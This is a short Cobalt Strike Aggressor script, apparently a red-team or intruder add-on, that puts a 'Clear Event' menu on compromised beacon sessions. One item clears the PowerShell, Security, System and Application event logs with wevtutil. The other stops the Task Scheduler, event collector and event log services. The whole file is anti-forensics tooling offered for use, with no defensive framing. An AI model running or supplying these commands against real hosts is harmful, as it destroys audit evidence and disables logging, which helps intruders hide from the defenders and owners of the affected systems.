#timwhite
     menu "Clear Event" {

	item "clearev" {
        local('$bid');
        foreach $bid ($1){
            bshell($1, "wevtutil cl \"windows powershell\"");
            bshell($1, "wevtutil cl \"security\"");
            bshell($1, "wevtutil cl \"system\"");
	    bshell($1, "wevtutil cl \"Application\"");
        }
	}
	item "sc stop ev" {
        local('$bid');
	foreach $bid ($1){
            bshell($1, "sc stop Schedule");
            bshell($1, "sc stop wecsvc");
            bshell($1, "sc stop eventlog");
        }
	}
        }